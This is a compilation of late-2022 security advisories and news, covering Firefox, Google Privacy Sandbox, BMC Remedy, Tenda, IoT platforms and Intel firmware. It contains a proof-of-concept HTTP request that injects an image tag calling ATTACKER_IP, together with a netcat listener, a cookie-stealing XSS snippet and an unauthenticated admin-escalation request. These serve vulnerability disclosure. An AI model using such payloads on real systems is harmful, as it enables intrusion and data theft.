Ubuntu Security Notice 5726-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the contents of the addressbar, bypass security restrictions, cross-site tracing or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5726-1November 16, 2022firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the contents of theaddressbar, bypass security restrictions, cross-site tracing or executearbitrary code. (CVE-2022-45403, CVE-2022-45404, CVE-2022-45405,CVE-2022-45406, CVE-2022-45407, CVE-2022-45408, CVE-2022-45409, CVE-2022-45410,CVE-2022-45411, CVE-2022-45413, CVE-2022-40674, CVE-2022-45418, CVE-2022-45419,CVE-2022-45420, CVE-2022-45421)Armin Ebert discovered that Firefox did not properly manage while resolvingfile symlink. If a user were tricked into opening a specially crafted weblink,an attacker could potentially exploit these to cause a denial of service. (CVE-2022-45412)Jefferson Scher and Jayateertha Guruprasad discovered that Firefox did notproperly sanitize the HTML download file extension under certain circumstances.If a user were tricked into downloading and executing malicious content, aremote attacker could execute arbitrary code with the privileges of the userinvoking the programs. (CVE-2022-45415)Erik Kraft, Martin Schwarzl, and Andrew McCreight discovered that Firefoxincorrectly handled keyboard events. An attacker could possibly use thisissue to perform a timing side-channel attack and possibly figure out whichkeys are being pressed. (CVE-2022-45416)Kagami discovered that Firefox did not detect Private Browsing Mode correctly.An attacker could possibly use this issue to obtain sensitive information aboutPrivate Browsing Mode.(CVE-2022-45417)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         107.0+build2-0ubuntu0.20.04.1Ubuntu 18.04 LTS:  firefox                         107.0+build2-0ubuntu0.18.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-5726-1  CVE-2022-40674, CVE-2022-45403, CVE-2022-45404, CVE-2022-45405,  CVE-2022-45406, CVE-2022-45407, CVE-2022-45408, CVE-2022-45409,  CVE-2022-45410, CVE-2022-45411, CVE-2022-45412, CVE-2022-45413,  CVE-2022-45415, CVE-2022-45416, CVE-2022-45417, CVE-2022-45418,  CVE-2022-45419, CVE-2022-45420, CVE-2022-45421Package Information:  https://launchpad.net/ubuntu/+source/firefox/107.0+build2-0ubuntu0.20.04.1  https://launchpad.net/ubuntu/+source/firefox/107.0+build2-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5726-1

Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.
"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.
To that end, developers will need to complete an enrollment process in order

Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.

"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.

To that end, developers will need to complete an enrollment process in order to utilize the ads-related APIs, including Topics, FLEDGE, and Attribution Reporting.

Topics, which replaced Federated Learning of Cohorts (FLoC) earlier this year, aims to categorize user interests under different "topics" based on their device web browsing history. These inferred interests are then shared with marketers to serve targeted ads.

FLEDGE and Attribution reporting, on the other hand, enable custom audience targeting and help measure ad conversions without relying on cross-party user identifiers, respectively.

Organizations can also request access for a limited number of devices to test the Beta, plus register any apps which will utilize the Privacy Sandbox APIs.

The development comes after the search and advertising giant expanded the initiative to include its mobile operating system in February 2022, and followed it up with a developer preview in May 2022.

Privacy Sandbox is an effort led by Google to create a set of web standards for websites to access user information without compromising on privacy. It aims to facilitate online advertising without resorting to invasive methods like third-party tracking cookies or fingerprinting.

That said, the company's plans to turn off third-party cookies in the Chrome web browser have been delayed twice, with the technology now expected to be phased out sometime in the second half of 2024.

To complicate matters further, the proposals have drawn criticism from rival browser vendors like Mozilla Firefox and developers of other Chromium-based browsers such as Brave, Opera, and Vivaldi, who have said the newer methods would cement "Google's position as a web monopolist."

DuckDuckGo, which blocks Privacy Sandbox through its Chrome browser extension as of May 2022, said Topics allows Google to surveil users' online activities and share that information with advertisers for behavioral targeting without their consent.

"This targeting, regardless of how it's done, enables manipulation (ex. exploiting personal vulnerabilities), discrimination (ex. people not seeing job opportunities based on personal profiles), and filter bubbles (ex. creating echo chambers that can divide people) that many people would like to avoid," the company noted.

Despite the pushback, Google said it's looking to engage with the broader ecosystem and gather "continued feedback as we enter this next phase of testing."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google to Roll Out Privacy Sandbox Beta on Android 13 by Early 2023

BMC Remedy ITSM-Suite version 9.1.10 (20.02 in new versioning scheme) suffers from an html injection vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20221110-0 >  
=======================================================================  
               title: HTML Injection  
             product: BMC Remedy ITSM-Suite  
  vulnerable version: 9.1.10 (= 20.02 in new versioning scheme)  
       fixed version: 22.1  
          CVE number: CVE-2022-26088  
              impact: Low  
            homepage: https://www.bmc.com/it-solutions/remedy-itsm.html  
               found: 2021-08-11  
                  by: Daniel Hirschberger (Office Bochum)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix  
ITSM service provide out of-the-box IT Information Library (ITIL)  
service support functionality. Remedy ITSM Suite and BMC Helix ITSM  
service streamline and automate the processes around IT service desk,  
asset management, and change management operations. It also enables  
you to link your business services to your IT infrastructure to help  
you manage the impact of technology changes on business and business  
changes on technology — in real time and into the future. In addition,  
you can understand and optimize the user experience, balance current  
and future infrastructure investments, and view potential impact on  
the business by using a real-time service model."

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

Business recommendation:  
------------------------  
The vendor provides an updated version which should be installed immediately.

The vendor states that:  
 > We have done hardening in version 22.1.  
 > However, we do not agree with assigning the CVE to this vulnerability.  
 > As mentioned previously this is an informative vulnerability, and no real  
   impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or  
exfiltrate information.

Vulnerability overview/description:  
-----------------------------------  
1) HTML Injection (CVE-2022-26088)  
An authenticated attacker who can forward incidents per email is able to inject  
a limited set of HTML tags. This is accomplished by inserting arbitrary content  
into the "To:" field of the email. There is a filtering mechanism that prevents  
the injection of many HTML tags, for example <script>, and it also removes event  
handlers. An attacker is able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the  
incident which states that $USER has sent an email to <X> recipients. Upon  
clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary "src" attribute, an attacker can force  
the user's browser to make requests to his specified URL. This can be used to  
trigger actions on internal services via CSRF or exfiltrate information.

Proof of concept:  
-----------------  
1) HTML Injection (CVE-2022-26088)  
When an incident is viewed, there is a button which allows forwarding the  
incident by mail. After entering a TO address and the body of the email, it can  
be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing  
the 'Email.To.InternetEmail' parameter. The modified request is:

-------------------------------------------------------------------------------  
PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1  
Host: TARGET  
Cookie: […]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json;charset=utf-8  
X-Xsrf-Token: SOME_TOKEN  
Content-Length: ADAPT_AS_NEEDED  
Te: trailers  
Connection: close

{  
   "worknote": "pentest",  
   "access": true,  
   "Email.From.Person": {  
     "email": "SOME_SENDING_MAIL",  
     "fullName": "Pentest - SEC Consult",  
     "loginId": "USERNAME"  
   },  
   "Email.Subject": "SOME_SUBJECT",  
   "Email.Body": "test2",  
   "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>a@example.test",  
   "workInfoType": 16000  
}  
-------------------------------------------------------------------------------

The parameter Email.To.InternetEmail contains the payload. In this case an  
image tag containing the IP of the attacker was inserted:  
"<img src=http://LOCAL_IP:8001/>a@example.test"  
The a@example.test is needed to pass the email validation step and example.test  
was used to prevent sending out real emails.

After this step, the information that $USER has sent an email to 1 recipient  
will be appended in the activity log of this incident.

Now we start a local netcat listener with the command  
$ nc -vnlp 8001

Now we click on the number '1' in the activity log and see that the browser  
issues a request to our 'netcat' instance.

This confirms that the browser tries to load the image from the specified URL.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 9.1.10 this corresponds to version 20.02 as stated at the following URL:  
https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping

Vendor contact timeline:  
------------------------  
2021-09-07: Contacting vendor through email (appsec@bmc.com).  
2021-09-28: Vendor states that they did not get the first email.  
2021-09-29: Resending the advisory to their renewed GPG key.  
2021-10-29: Fix pending, request to delay publication.  
2021-11-18: Vulnerability is fixed and the fix is being evaluated.  
2022-01-17: Asking for a status update.  
2022-01-17: Vulnerability is fixed, no scheduled release.  
2022-01-24: Tentative release on 2022-03-09; discussing impact 'best practice' vs 'low'.  
2022-02-24: Fixed in Smart-IT 22.1, release postponed.  
2022-03-30: Release postponed to May 2022.  
2022-04-20: Asking if the fixed version will be released in May.  
2022-05-17: Asking if the fixed version will be released in May.  
2022-05-23: Release rescheduled to end of June/July  
2022-08-04: Asking for status  
2022-08-05: Product was released  
2022-08-31: Asking for link to update  
2022-09-01: Vendor does not agree with getting a CVE assigned, impact is explained again  
2022-09-06: Vendor asks for final version of advisory  
2022-09-06: Asking vendor for a new GPG key because of expiry  
2022-09-07: Sending the final advisory to the vendor  
2022-09-12: Vendor will check the advisory and answer in 1 or 2 days  
2022-09-14: Vendor states that their application is not vulnerable to CSRF and  
             asks if other data could be leaked via the HTTP request  
2022-09-15: We clarify that their application does not seem to be vulnerable to  
             CSRF but the HTML injection allows CSRFing other applications in the intranet.  
             Also we did not have time to assess if other data besides User-Agent and the  
             client's IP can be leaked.  
2022-10-04: We request an update to the previous mail.  
2022-10-19: Vendor sticks to their own original impact analysis.  
2022-11-10: Public release of security advisory.

Solution:  
---------  
Upgrade to version 22.1 or later which can be downloaded at the vendor's page:  
https://www.bmc.com/support/resources/product-downloads.html

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2022

BMC Remedy ITSM-Suite 9.1.10 / 20.02 HTML Injection

Tenda AC1200 Router Model W15Ev2 V15.11.0.10(1576) was discovered to contain a stack overflow via the setWanPpoe function. This vulnerability allows attackers to cause a Denial of Service (DoS) via crafted overflow data.

CVE-2022-42060: Vulnerabilities in Tenda's W15Ev2 AC1200 Router

In Tenda AC1200 Router model W15Ev2 V15.11.0.10(1576), there exists a command injection vulnerability in the function formSetFixTools. This vulnerability allows attackers to run arbitrary commands on the server via the hostname parameter.

CVE-2022-40847: Vulnerabilities in Tenda's W15Ev2 AC1200 Router

Konker v2.3.9 was to discovered to contain a Cross-Site Request Forgery (CSRF).

**CVE-ID: CVE-2022-35613**

**Popular posts from this blog**

**CVE-ID: CVE-2022-35137**

DGIOT Lightweight industrial IoT v4.5.4 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities. The platform does not output encode JS payloads such as <script>alert(document.cookie)</script>. These are instances of stored XSS that can be abused to steal admin user cookies. References: https://owasp.org/www-community/attacks/xss/

**CVE-ID: CVE-2022-35135, CVE-2022-35136**

CVE-2022-35136:  Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests. CVE-2022-35135:  Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges  via a crafted request sent to /api/user/upsert/<uuid>.  The platform successfully processes API requests even without valid cookies.For example, the following request to update user profile is processed, even though the request does not have any cookie/api key. (Cookie header is blank in the request) Since API requests to the platform are not authenticated, a user can assign themselves an admin role, by sending a request to  http://192.168.72.157/api/user/upsert/<userid>  endpoint. HTTP Request: POST /api/user/upsert/8c34fa03- 706a-4dc7-b484-cd8e0c329c81 HTTP/1.1 Host: 192.168.72.157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: \*/\* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Re

**CVE-ID: CVE-2022-31861**

Cross site Scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs. Patch details:  https://github.com/thingsboard/thingsboard/pull/7385 Audit logs help in establishing accountability of usage among various users of an application. However, if this functionality is not implemented securely, attackers can abuse the implementation flaws to launch attacks against application users. In this blog, we take a look at an XSS vulnerability in the audit logs feature of Thingsboard, an open-source IoT platform, and how it leads to account takeover of admin accounts. This vulnerability can be exploited by an existing lower privileged user of the platform. According to Thingsboard's documentation ( https://thingsboard.io/docs/pe/user-guide/rbac/ ), on the community edition, "a tenant administrator manages devices, dashboards, customers, and other entities that belong to a particular tenant". Each tenant has several customers and as

CVE-2022-35613: CVE-ID: CVE-2022-35613

Improper input validation for some Intel(R) PROSet/Wireless WiFi, Intel vPro(R) CSME WiFi and Killer(TM) WiFi products may allow unauthenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® PROSet/Wireless WiFi, Intel vPro® CSME WiFi and Killer™ WiFi Advisory**

**Summary: **

A potential security vulnerability in some Intel® PROSet/Wireless WiFi, Intel vPro® CSME WiFi and Killer™ WiFi products may allow denial of service. Intel is releasing a firmware update to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-26047

Description: Improper input validation for some Intel(R) PROSet/Wireless WiFi, Intel vPro(R) CSME WiFi  and Killer(TM) WiFi products may allow unauthenticated user to potentially enable denial of service via local access.

CVSS Base Score: 4.3 Medium

CVSS Vector:  CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

**Affected Products:**

Intel® PROSet/Wireless WiFi firmware before version 22.140, Killer™ WiFi firmware before version 3.1122.3158 and UEFI version 2.2.14.22176.2.

**CVE ID**

**Affected Products**

**Affected OS**

CVE-2022-26047

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Windows 10 & 11

Linux

Chrome OS

UEFI

CSME

CVE-2022-26047

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Killer™ Wi-Fi 6 AX1650

Windows 10 & 11

**Recommendations:**

**Windows:**

Intel recommends updating Intel® PROSet/Wireless WiFi software to version 22.140 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19351/windows-10-and-windows-11-wi-fi-drivers-for-intel-wireless-adapters.html

Intel recommends updating Killer™ WiFi software to version 3.1122.3158 or later.

Updates for Killer™ products are available for download at this location:

https://www.intel.com/content/www/us/en/download/19779/intel-killer-performance-suite.html?wapkw=killer

**UEFI:**

Intel recommends updating Intel® PROSet/Wireless WiFi UEFI drivers to version 2.2.14.22176 or later.

Please contact your OEM support group to obtain the correct driver version.

**Chrome OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed to Chromium by November 08, 2022.

For any Google Chrome OS solution and schedule, please contact Google directly.

**Linux OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed by November 08, 2022.

Consult the regular open-source channels to obtain this update.

**Recommendation for Intel vPRO® CSME WiFi products:**

Intel recommends updating Intel vPRO® CSME WiFi products to the following versions or newer.

**Platform**

**CSME Version**

**Device**

12th Generation Intel® Core Processor

16.1.25.1885v2

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

12th Generation Intel® Core Processor – Performance cores

16.1.25.1865v6.1

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

11th Generation Intel® Core Processor

15.0.42.2235

Intel® Wi-Fi 6 AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

10th Generation Intel® Core Processor

14.1.67.2046

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

ntel® Wi-Fi 6 AX200

9th Generation Intel® Core Processor

12.0.92.2145v3

Intel® Wi-Fi 6 AX200

8th Generation Intel® Core Processor

12.0.92.2145v3

Intel® Wi-Fi 6 AX200

Intel recommends that users of Intel® vPRO® CSME WiFi products update to the latest version provided by the system manufacturer that addresses these issues.  

**Acknowledgements:**

The following issue was found internally by an Intel employee.  Intel would like to thank Julien Lenoir.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26047: INTEL-SA-00699

Uncontrolled search path element in the PresentMon software maintained by Intel(R) before version 1.7.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**PresentMon Advisory**

**Summary: **

A potential security vulnerability in the PresentMon software maintained by Intel® may allow escalation of privilege. Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-26086

Description: Uncontrolled search path element in the PresentMon software maintained by Intel(R) before version 1.7.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

PresentMon software maintained by Intel® before version 1.7.1.

**Recommendations:**

Intel recommends updating the PresentMon software maintained by Intel® to version 1.7.1 or later.

Updates are available for download at this location:

https://github.com/GameTechDev/PresentMon/releases

**Acknowledgements:**

Intel would like to thank avivanoa for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26086: INTEL-SA-00711

Uncontrolled search path in the software installer for Intel(R) System Studio for all versions, may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® System Studio Advisory**

**Summary: **

A potential security vulnerability in the Intel® System Studio software may allow escalation of privilege.  Intel is not releasing updates to mitigate this potential vulnerability and has issued a Product Discontinuation Notice for Intel® System Studio software.

**Vulnerability Details:**

CVEID: CVE-2021-33064

Description: Uncontrolled search path in the software installer for Intel(R) System Studio for all versions, may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score:  6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® System Studio software all versions.

**Recommendations:**

Intel has issued a Product Discontinuation Notice for the Intel® System Studio software and recommends that users of the Intel® System Studio software uninstall it or discontinue use at their earliest convenience.

 Intel® oneAPI is considered as the successor product to replace the System Studio software. Intel® oneAPI installer is based on code which does not have the issue in question.

**Acknowledgements:**

Intel would like to thank houjingyi for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-33064: INTEL-SA-00558

Improper authentication in subsystem for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2022.3 IPU - Intel® Chipset Firmware Advisory**

Intel ID:

INTEL-SA-00610

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

11/08/2022

Last revised:

11/08/2022

**Summary: **

Potential security vulnerabilities in some Intel® Chipset Firmware in Intel® Converged Security and Manageability Engine (CSME), Intel® Active Management Technology (AMT) and Intel® Server Platform Services (SPS) may allow escalation of privilege or denial of service.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-26845

Description: Improper authentication in firmware for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow an unauthenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.7 High

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

CVEID: CVE-2022-27497

Description: Null pointer dereference in firmware for Intel(R) AMT before version 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow an unauthenticated user to potentially enable denial of service via network access.

CVSS Base Score: 8.6 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2022-29893

Description: Improper authentication in firmware for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow an authenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.1 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVEID: CVE-2021-33159

Description: Improper authentication in subsystem for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score:  7.4 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H

CVEID: CVE-2022-29466

